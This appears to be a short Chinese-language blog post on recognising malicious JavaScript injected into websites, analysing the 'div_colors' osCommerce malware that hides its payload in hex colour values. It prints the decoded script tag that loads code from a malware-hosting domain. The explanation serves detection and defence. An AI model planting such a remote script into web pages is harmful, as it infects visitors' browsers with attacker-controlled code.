一般快速判斷是不是被插入一段惡意的 JavaScript 都會看幾個特徵
如: <Iframe>標籤 、unescape() 、eval() function、或是 array 裡面帶有很多奇怪的字串、或變數定義太多最後有拼接組合起來!
從這個例子來看可以發現在 array 那邊很奇怪,後面寫了很多 16進位的顏色值,再繼續追下去會看到 有一個 function 叫做 div_pick_colours() 這裡就是關鍵囉,他就是主要把 var div_colors 這個變數裡面的值組合起來 最終在網頁上呈現的內容
會是以下連結
<script type="text/javascript" src="http://掛馬網域exploit.cz.cc"><script>
Virustotal Result
滿多網站都被寫入了這個手法的惡意 JavaScript
相關事件參考:My site is reported as Attack site by GoogleTry Pick Colors osCommerce Malware Hack Hacked webshop! The “div_colors” Malware Updatemalicious function div_pick_colors and try_pick_colors
